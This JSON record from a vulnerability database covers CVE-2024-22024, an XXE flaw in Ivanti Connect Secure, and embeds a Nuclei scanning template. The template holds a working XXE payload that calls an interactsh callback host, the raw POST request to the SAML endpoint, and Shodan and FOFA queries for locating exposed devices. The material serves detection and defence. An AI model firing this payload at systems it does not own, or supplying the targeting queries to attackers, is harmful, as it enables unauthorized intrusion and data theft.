{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2024-22024/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2024-22024/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2024-22024/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2024-22024/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2024-22024/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2024-22024"},"sightings":{"href":"/api/v1/sightings/cve-2024-22024"}},"enrichments":{"nuclei":{"nuclei":true,"nuclei_template":"http/cves/2024/CVE-2024-22024.yaml","nuclei_template_severity":"high","nuclei_template_yaml":"id: CVE-2024-22024\n\ninfo:\n  name: Ivanti Connect Secure - XXE\n  author: watchTowr\n  severity: high\n  description: |\n    Ivanti Connect Secure is vulnerable to XXE (XML External Entity) injection.\n  impact: |\n    Successful exploitation of this vulnerability could lead to unauthorized access to sensitive information or remote code execution.\n  remediation: |\n    Apply the latest security patches or updates provided by Ivanti to fix the XXE vulnerability.\n  reference:\n    - https://labs.watchtowr.com/are-we-now-part-of-ivanti/\n    - https://twitter.com/h4x0r_dz/status/1755849867149103106/photo/1\n  classification:\n    epss-score: 0.94721\n    epss-percentile: 0.99855\n  metadata:\n    max-request: 1\n    vendor: ivanti\n    product: connect_secure\n    shodan-query:\n      - \"html:\\\"welcome.cgi?p=logo\\\"\"\n      - http.title:\"ivanti connect secure\"\n      - http.html:\"welcome.cgi?p=logo\"\n    fofa-query:\n      - body=\"welcome.cgi?p=logo\"\n      - title=\"ivanti connect secure\"\n    google-query: intitle:\"ivanti connect secure\"\n  tags: cve,cve2024,xxe,ivanti,vkev,vuln\n\nvariables:\n  payload: '<?xml version=\"1.0\" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM\n    \"http://{{interactsh-url}}/x\"> %watchTowr;]><r></r>'\n\nhttp:\n  - raw:\n      - |\n        POST /dana-na/auth/saml-sso.cgi HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        SAMLRequest={{base64(payload)}}\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: interactsh_protocol  # Confirms the DNS Interaction\n        words:\n          - \"dns\"\n\n      - type: word\n        part: body\n        words:\n          - '/dana-na/'\n          - 'WriteCSS'\n        condition: and\n# digest: 4a0a0047304502201be8201304568dad2f484eca1ccaed8e8ad430ed743291e8f0dd7ba8698c4c31022100884e165c034d65679d6008b96f52b7a36b1fd58ed5ca5bd459aa3ee6c1eceee7:922c64590222798bb761d5b6d8e72950"}},"vuln_id":"cve-2024-22024"}